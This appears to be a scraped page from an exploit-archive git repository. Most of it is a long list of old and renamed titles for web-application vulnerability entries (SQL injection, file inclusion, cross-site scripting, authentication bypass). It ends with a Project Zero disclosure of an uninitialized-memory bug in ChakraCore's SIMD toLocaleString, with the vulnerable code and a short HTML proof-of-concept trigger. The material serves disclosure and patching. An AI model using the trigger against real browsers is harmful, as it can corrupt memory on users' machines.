flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure

fungamez rc1 - (Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities
fungamez rc1 - Authentication Bypass / Local File Inclusion

pastelcms 0.8.0 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
pastelcms 0.8.0 - Local File Inclusion / SQL Injection

mixedcms 1.0b - (Local File Inclusion / Arbitrary File Upload / Authentication Bypass/File Disclosure) Multiple Vulnerabilities
mixedcms 1.0b - Local File Inclusion / Arbitrary File Upload / Authentication Bypass / File Disclosure

fowlcms 1.1 - (Authentication Bypass / Local File Inclusion / Arbitrary File Upload) Multiple Vulnerabilities
fowlcms 1.1 - Authentication Bypass / Local File Inclusion / Arbitrary File Upload

photo-rigma.biz 30 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
photo-rigma.biz 30 - SQL Injection / Cross-Site Scripting

Dew-NewPHPLinks 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Dew-NewPHPLinks 2.0 - Local File Inclusion / Cross-Site Scripting

Leap CMS 0.1.4 - (SQL Injection / Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities
Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload

TemaTres 1.0.3 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
TemaTres 1.0.3 - Authentication Bypass / SQL Injection / Cross-Site Scripting

PHP recommend 1.3 - (Authentication Bypass / Remote File Inclusion / Code Inject) Multiple Vulnerabilities
PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Inject
my-colex 1.4.2 - (Authentication Bypass / Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
my-gesuad 0.9.14 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection
my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting

vidshare pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
vidshare pro - SQL Injection / Cross-Site Scripting

asp inline Corporate Calendar - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting

minitwitter 0.3-beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
minitwitter 0.3-beta - SQL Injection / Cross-Site Scripting
small pirate 2.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
amember 3.1.7 - (Cross-Site Scripting / SQL Injection / HTML Injection) Multiple Vulnerabilities
small pirate 2.1 - Cross-Site Scripting / SQL Injection
amember 3.1.7 - Cross-Site Scripting / SQL Injection / HTML Injection

elitecms 1.01 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
elitecms 1.01 - SQL Injection / Cross-Site Scripting

flashlight free edition - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
flashlight free edition - Local File Inclusion / SQL Injection

propertymax pro free - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
propertymax pro free - SQL Injection / Cross-Site Scripting

virtue news - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
virtue news - SQL Injection / Cross-Site Scripting

mrcgiguy freeticket - (Cookie Handling / SQL Injection) Multiple Vulnerabilities
mrcgiguy freeticket - Cookie Handling / SQL Injection

yogurt 0.3 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
yogurt 0.3 - Cross-Site Scripting / SQL Injection

campus virtual-lms - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
campus virtual-lms - Cross-Site Scripting / SQL Injection

translucid 1.75 - Multiple Vulnerabilities
TransLucid 1.75 - Multiple Vulnerabilities

impleo music Collection 2.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
impleo music Collection 2.0 - SQL Injection / Cross-Site Scripting

adaptweb 0.9.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
adaptweb 0.9.2 - Local File Inclusion / SQL Injection

CMS buzz - (Cross-Site Scripting / Password Change/HTML Injection) Multiple Vulnerabilities
CMS buzz - Cross-Site Scripting / Password Change / HTML Injection

elgg - (Cross-Site Scripting / Cross-Site Request Forgery/Change Password) Multiple Vulnerabilities
elgg - Cross-Site Scripting / Cross-Site Request Forgery / Change Password

phpCollegeExchange 0.1.5c - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
phpCollegeExchange 0.1.5c - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting

Tribiq CMS 5.0.12c - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
Tribiq CMS 5.0.12c - Cross-Site Scripting / Local File Inclusion

Virtue Online Test Generator - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting

webasyst shop-script - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
webasyst shop-script - Blind SQL Injection / Cross-Site Scripting

ebay clone 2009 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities
ebay clone 2009 - Cross-Site Scripting / Blind SQL Injection

censura 1.16.04 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
censura 1.16.04 - Blind SQL Injection / Cross-Site Scripting

good/bad vote - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
good/bad vote - Cross-Site Scripting / Local File Inclusion

mcshoutbox 1.1 - (SQL Injection / Cross-Site Scripting / shell) Multiple Vulnerabilities
mcshoutbox 1.1 - SQL Injection / Cross-Site Scripting / shell

Million-Dollar Pixel Ads Platinum - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Million-Dollar Pixel Ads Platinum - SQL Injection / Cross-Site Scripting
almond Classifieds ads - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
skadate dating - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
XOOPS Celepar Module Qas - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
garagesalesjunkie - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
almond Classifieds ads - Blind SQL Injection / Cross-Site Scripting
skadate dating - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting
XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting
garagesalesjunkie - SQL Injection / Cross-Site Scripting

iwiccle 1.01 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
iwiccle 1.01 - Local File Inclusion / SQL Injection

Orbis CMS 1.0 - (File Delete/Download File / Arbitrary File Upload / SQL Injection) Multiple Vulnerabilities
Orbis CMS 1.0 - File Delete / Download File / Arbitrary File Upload / SQL Injection
cmsphp 0.21 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
d.net CMS - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
cmsphp 0.21 - Local File Inclusion / Cross-Site Scripting
d.net CMS - Local File Inclusion / SQL Injection

mobilelib gold 3.0 - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities
mobilelib gold 3.0 - Authentication Bypass / SQL Injection

elvin bts 1.2.2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
elvin bts 1.2.2 - SQL Injection / Cross-Site Scripting

shopmaker CMS 2.0 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities
shopmaker CMS 2.0 - Blind SQL Injection / Local File Inclusion
mybackup 1.4.0 - (File Download / Remote File Inclusion) Multiple Vulnerabilities
tenrok 1.1.0 - (File Disclosure / Remote Code Execution) Multiple Vulnerabilities
mybackup 1.4.0 - File Download / Remote File Inclusion
tenrok 1.1.0 - File Disclosure / Remote Code Execution
AccessoriesMe PHP Affiliate Script 1.4 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
opennews 1.0 - (SQL Injection / Remote Code Execution) Multiple Vulnerabilities
AccessoriesMe PHP Affiliate Script 1.4 - Blind SQL Injection / Cross-Site Scripting
opennews 1.0 - SQL Injection / Remote Code Execution

PHP Script Forum Hoster - (Topic Delete / Cross-Site Scripting) Multiple Vulnerabilities
PHP Script Forum Hoster - Topic Delete / Cross-Site Scripting

LM Starmail 2.0 - (SQL Injection / File Inclusion) Multiple Vulnerabilities
LM Starmail 2.0 - SQL Injection / File Inclusion

logoshows bbs 2.0 - (File Disclosure / Insecure Cookie Handling) Multiple Vulnerabilities
logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling

tgs CMS 0.x - (Cross-Site Scripting / SQL Injection / File Disclosure) Multiple Vulnerabilities
tgs CMS 0.x - Cross-Site Scripting / SQL Injection / File Disclosure

Vtiger CRM 5.0.4 - (Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting

totalcalendar 2.4 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities
totalcalendar 2.4 - Blind SQL Injection / Local File Inclusion

nullam blog 0.1.2 - (Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
nullam blog 0.1.2 - Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting

gyro 5.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
gyro 5.0 - SQL Injection / Cross-Site Scripting

Joomla! Component Hotel Booking System - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Joomla! Component Hotel Booking System - Cross-Site Scripting / SQL Injection

Micro CMS 3.5 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities
Micro CMS 3.5 - SQL Injection / Local File Inclusion

Ez Blog 1.0 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
Ez Blog 1.0 - Cross-Site Scripting / Cross-Site Request Forgery

Recipe Script 5.0 - (Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities
Recipe Script 5.0 - Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting

eUploader PRO 3.1.1 - (Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities
eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting

Pre Job Board 1.0 - SQL Bypass
Pre Job Board 1.0 - SQL Authentication Bypass

Pre Jobo .NET - SQL Bypass
Pre Jobo .NET - SQL Authentication Bypass

PHPDirector Game Edition 0.1 - (Local File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
PHPDirector Game Edition 0.1 - Local File Inclusion / SQL Injection / Cross-Site Scripting

gridcc script 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
gridcc script 1.0 - SQL Injection / Cross-Site Scripting

Layout CMS 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Layout CMS 1.0 - SQL Injection / Cross-Site Scripting

KosmosBlog 0.9.3 - (SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
KosmosBlog 0.9.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery

ZeusCMS 0.2 - (Database Backup Dump / Local File Inclusion) Multiple Vulnerabilities
ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion

Katalog Stron Hurricane 1.3.5 - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities
Katalog Stron Hurricane 1.3.5 - Remote File Inclusion / SQL Injection

Open Source Classifieds 1.1.0 - Alpha (OSClassi) Multiple Vulnerabilities
Open Source Classifieds 1.1.0 Alpha (OSClassi) - SQL Injection / Cross-Site Scripting / Arbitrary Admin Change

phpMySite - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
phpMySite - Cross-Site Scripting / SQL Injection

quality point 1.0 newsfeed - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
quality point 1.0 newsfeed - SQL Injection / Cross-Site Scripting

DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities
DynPG CMS 4.1.0 - popup.php / counter.php Multiple Vulnerabilities

jevoncms - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities
jevoncms - Local File Inclusion / Remote File Inclusion

SIESTTA 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities
JV2 Folder Gallery 3.1.1 - 'popup_slideshow.php' Multiple Vulnerabilities

parlic Design - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities
parlic Design - SQL Injection / Cross-Site Scripting / HTML Injection

MileHigh Creative - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities
MileHigh Creative - SQL Injection / Cross-Site Scripting / HTML Injection

QuickTalk 1.2 - (Source Code Disclosure) Multiple Vulnerabilities
QuickTalk 1.2 - Source Code Disclosure

K-Search - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
K-Search - SQL Injection / Cross-Site Scripting

Macs CMS 1.1.4 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
Macs CMS 1.1.4 - Cross-Site Scripting / Cross-Site Request Forgery

Guestbook Script PHP - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities
Guestbook Script PHP - Cross-Site Scripting / HTML Injection

Max's Guestbook - (HTML Injection / Cross-Site Scripting) Multiple Vulnerabilities
Max's Guestbook - HTML Injection / Cross-Site Scripting

Allpc 2.5 osCommerce - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Allpc 2.5 osCommerce - SQL Injection / Cross-Site Scripting

TradeMC E-Ticaret - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
TradeMC E-Ticaret - SQL Injection / Cross-Site Scripting

Cag CMS 0.2 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities
Cag CMS 0.2 - Cross-Site Scripting / Blind SQL Injection

Tastydir 1.2 - (1216) Multiple Vulnerabilities
Tastydir 1.2 (1216) - Multiple Vulnerabilities

WordPress - 'do_trackbacks()' function SQL Injection
WordPress 3.0.1 - 'do_trackbacks()' function SQL Injection

F3Site 2011 alfa 1 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
F3Site 2011 alfa 1 - Cross-Site Scripting / Cross-Site Request Forgery

PHP Coupon Script 6.0 - (bus) Blind SQL Injection
PHP Coupon Script 6.0 - 'bus' Parameter Blind SQL Injection

GAzie 5.10 - (Login Parameter) Multiple Vulnerabilities
GAzie 5.10 - Login Parameter Multiple Vulnerabilities

BST - BestShopPro (nowosci.php) Multiple Vulnerabilities
BST (BestShopPro) - 'nowosci.php' Multiple Vulnerabilities

Fork CMS 3.2.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting

DFLabs PTK 1.0.5 - (Steal Authentication Credentials) Multiple Vulnerabilities
DFLabs PTK 1.0.5 - Steal Authentication Credentials

Wolfcms 0.75 - (Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities
Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting

Axous 1.1.1 - (Cross-Site Request Forgery / Persistent Cross-Site Scripting) Multiple Vulnerabilities
Axous 1.1.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting

myPHPNuke 1.8.8 - links.php Cross-Site Scripting
myPHPNuke 1.8.8 - 'links.php' Cross-Site Scripting

Flying Dog Software Powerslave 4.3 Portalmanager - sql_id Information Disclosure
Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information Disclosure
PHPWebGallery 1.3.4/1.5.1 - comments.php Multiple Parameter SQL Injection
PHPWebGallery 1.3.4/1.5.1 - category.php search Parameter SQL Injection
PHPWebGallery 1.3.4/1.5.1 - picture.php image_id Parameter SQL Injection
PHPWebGallery 1.3.4/1.5.1 - 'comments.php' SQL Injection
PHPWebGallery 1.3.4/1.5.1 - 'category.php' SQL Injection
PHPWebGallery 1.3.4/1.5.1 - 'picture.php' SQL Injection
myPHPNuke 1.8.8 - reviews.php letter Parameter Cross-Site Scripting
myPHPNuke 1.8.8 - download.php dcategory Parameter Cross-Site Scripting
myPHPNuke 1.8.8 - 'reviews.php' Cross-Site Scripting
myPHPNuke 1.8.8 - 'download.php' Cross-Site Scripting

phpVID 1.2.3 - Multiple Vulnerabilities
PHPVID 1.2.3 - Multiple Vulnerabilities
PHPWebGallery 1.4.1 - category.php Multiple Parameter Cross-Site Scripting
PHPWebGallery 1.4.1 - picture.php Multiple Parameter Cross-Site Scripting
PHPWebGallery 1.4.1 - 'category.php' Cross-Site Scripting
PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting

phpMyAdmin 2.7 - sql.php Cross-Site Scripting
phpMyAdmin 2.7 - 'sql.php' Cross-Site Scripting

ADOdb 4.6/4.7 - Tmssql.php Cross-Site Scripting
ADODB 4.6/4.7 - 'Tmssql.php' Cross-Site Scripting

PHPWebGallery 1.x - comments.php Cross-Site Scripting
PHPWebGallery 1.x - 'comments.php' Cross-Site Scripting

MySQLDumper 1.21 - sql.php Cross-Site Scripting
MySQLDumper 1.21 - 'sql.php' Cross-Site Scripting

KikChat - (Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities
KikChat - Local File Inclusion / Remote Code Execution

EasyE-Cards 3.10 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
EasyE-Cards 3.10 - SQL Injection / Cross-Site Scripting

LuxCal 3.2.2 - (Cross-Site Request Forgery/Blind SQL Injection) Multiple Vulnerabilities
LuxCal 3.2.2 - Cross-Site Request Forgery / Blind SQL Injection
Vastal I-Tech DVD Zone - view_mag.php mag_id Parameter SQL Injection
Vastal I-Tech DVD Zone - view_mag.php mag_id Parameter Cross-Site Scripting
Vastal I-Tech DVD Zone - 'view_mag.php' SQL Injection
Vastal I-Tech DVD Zone - 'view_mag.php' Cross-Site Scripting

Interspire Email Marketer - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities
Interspire Email Marketer - Cross-Site Scripting / HTML Injection / SQL Injection

ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Query Execution
ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution

miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (Execute SQL Query)
miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (SQL Execution)

ntop-ng 2.5.160805 - Username  Enumeration
ntop-ng 2.5.160805 - Username Enumeration
2016-12-22 05:01:16 +00:00

36 lines
1.1 KiB
HTML
Executable file
Raw Blame History

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=961
The following code occurs in JavascriptSIMDObject::ToLocaleString in JavascriptSimdObject.cpp:
Var* newArgs = HeapNewArray(Var, numArgs);
switch (numArgs)
{
case 1:
break;
case 2:
newArgs[1] = args[1];
break;
case 3:
newArgs[1] = args[1];
newArgs[2] = args[2];
break;
default:
Assert(UNREACHED);
}
If the call has more than three arguments, it will fall through, leaving newArgs uninitialized. This will cause toLocaleString to be called on uninitialized memory, having a similar effect to type confusion (as integers in the memory can be confused for pointers and vice-versa). A minimal PoC is as follows, and a full PoC is attached:
var v = SIMD.Int32x4(1, 2, 3, 4);
v.toLocaleString(1, 2, 3, 4)
-->
<html><body><script>
try{
var v = SIMD.Int32x4(1, 2, 3, 4);
alert(v.toLocaleString(1, 2, 3, 4, 5, 6, 7));
}catch(e){
alert(e.message);
}
</script></body></html>
Reference in a new issue View git blame Copy permalink